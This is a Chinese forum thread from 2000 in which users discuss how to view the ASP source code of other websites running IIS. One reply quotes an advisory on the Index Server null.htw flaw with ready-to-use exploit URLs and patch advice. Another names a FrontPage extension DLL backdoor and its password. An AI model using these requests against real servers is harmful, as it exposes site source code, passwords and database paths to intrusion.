谁是黑客????

堆堆 2000-07-28 12:56:00
谁能看IIS+SP6的ASP代码?
...全文
328 18 打赏 收藏 转发到动态 举报
写回复
用AI写文章
18 条回复
切换为时间正序
请发表友善的回复…
发表回复
WangTiger 2000-08-13
  • 打赏
  • 举报
回复
来了,干啥!我姓高,叫手!高手!哈哈
堆堆 2000-08-12
  • 打赏
  • 举报
回复
高手快来!!!!
堆堆 2000-08-10
  • 打赏
  • 举报
回复
关注!
蝈蝈俊 2000-08-08
  • 打赏
  • 举报
回复
告诉你不准搞破坏。呵呵呵,我就是那这个看到8848的源码,和改版前的CSDN的源码。

Cerberus安全组织发现了微软Index Server的第三个可以察看asp源代码和其它页面的漏洞。
包括运行IIS4或者IIS5的Index Server,甚至以及添打了最近关于参看源代码的补丁程序的系统,
或者更不没有.htw文件的系统,一样存在该问题。获得asp程序,甚至global.asa文件的源代码,
无疑对系统是一个非常重大的安全隐患。往往这些代码中包含了用户密码和ID,以及数据库的源
路径和名称等等。这对于攻击者收集系统信息,方面下一步的入侵都是非常重要的。

通过构建下面的特殊程序可以参看该程序源代码:
http://www.victim.com/null.htw?CiWebHitsFile=/default.asp&CiRestriction=none&CiHiliteType=Full
这样只是返回一些html格式的文件代码,但是当你添加%20到CiWebHitsFile的参数后面,如下:

http://www.victim.com/null.htw?CiWebHitsFile=/default.asp%20&CiRestriction=none&CiHiliteType=Full
这将获得该程序的源代码。
(注意:/default.asp是以web的根开始计算。如某站点的http://www.victim.com/welcome/welcome.asp
那么对应就是:
http://www.victim.com/null.htw?CiWebHitsFile=/welcome/welcome.asp%20&CiRestriction=none&CiHiliteType=Full
)

由于'null.htw'文件并非真正的系统映射文件,所以只是一个储存在系统内存中的虚拟文件。哪怕你已经从你的
系统中删除了所有的真实的.htw文件,但是由于对null.htw文件的请求默认是由webhits.dll来处理。所以,IIS
仍然收到该漏洞的威胁。

建议解决方法:
如果该webhits提供的功能是系统必须的,请下载相应的补丁程序。
如果没必要,请用IIS的MMC管理工具简单移除.htw的映象文件。

相关信息可以参看下面链接:
http://www.microsoft.com/technet/security/bulletin/ms00-006.asp

补丁程序如下:

Index Server 2.0:
Intel:
http://www.microsoft.com/downloads/release.asp?ReleaseID=17727

Alpha:
http://www.microsoft.com/downloads/release.asp?ReleaseID=17728

Indexing Services for Windows 2000:
Intel:
http://www.microsoft.com/downloads/release.asp?ReleaseID=17726
 



flyfox 2000-08-08
  • 打赏
  • 举报
回复
ghj1976,如何实现!
堆堆 2000-08-08
  • 打赏
  • 举报
回复
cjlong:什么用?/_vti_bin/_vti_aut/dvwssr.dll好象关了默认的WEB站点就没有
蝈蝈俊 2000-08-08
  • 打赏
  • 举报
回复
我如果没记错的话,这个错误好象是打了 sp6 而没打 sp3时才有的。
flyfox 2000-08-08
  • 打赏
  • 举报
回复
是用上述哪种方法还是别的方法。
我是试自己的主页我的服务器没装sp5,sp6, 报告说文件不存在。
蝈蝈俊 2000-08-08
  • 打赏
  • 举报
回复
这个露洞又不是没有补丁,打了补丁当然不行了。
flyfox 2000-08-08
  • 打赏
  • 举报
回复
还是不行,如要看http://www.aaa.com/aaa/index.asp的源码,
即在地址栏输入:
http://www.aaa.com/null.htw?CiWebHitsFile=/aaa/index.asp%20&CiRestriction=none&CiHiliteType=Full
或在地址栏输入:
http://www.victim.com/null.htw?CiWebHitsFile=/aaa/index.asp%20&CiRestriction=none&CiHiliteType=Full
或在地址栏输入:
http://www.victim.com/null.htw?CiWebHitsFile=www.aaa.com/aaa/index.asp%20&CiRestriction=none&CiHiliteType=Full


cjlong 2000-08-04
  • 打赏
  • 举报
回复
我不是黑客,但我最喜欢看asp 的代码。
最新的方法:
随IIS和Frontpage Extention server而来的动态库程序,存在后门,允许用户远程读取asp、asa和CGI程序的源代码。但这个动态库要求有密码,这个后门的密码是: "Netscape engineers are weenies!"
程序路径为: /_vti_bin/_vti_aut/dvwssr.dll
堆堆 2000-08-04
  • 打赏
  • 举报
回复
奇怪我的朋友只装了sp5但我用%81
I can't Look Code! Why?????
ROBOT 2000-08-04
  • 打赏
  • 举报
回复
嗯?
蝈蝈俊 2000-08-04
  • 打赏
  • 举报
回复
呵呵呵,如果没按照顺序pack3,pack4,pack5,pack6 打pack 呵呵呵呵,很简单的罗。嘻嘻嘻
yiwei 2000-07-30
  • 打赏
  • 举报
回复
我有,其实很简单:控制服务器,至于你怎么控制,那就是你的本事了,是收买,是暴力,还是HACK,随便.
堆堆 2000-07-28
  • 打赏
  • 举报
回复
我的意识是说谁有办法看到一网站的ASP原代码(该网站是IIS4.0+SP6)
  • 打赏
  • 举报
回复
我也试试,
lumine@sohu.com
hlbl11 2000-07-28
  • 打赏
  • 举报
回复
我能试一下,请传一段代码到wtigter@yeah.net

28,390

社区成员

发帖
与我相关
我的任务
社区描述
ASP即Active Server Pages,是Microsoft公司开发的服务器端脚本环境。
社区管理员
  • ASP
  • 无·法
加入社区
  • 近7日
  • 近30日
  • 至今
社区公告
暂无公告

试试用AI创作助手写篇文章吧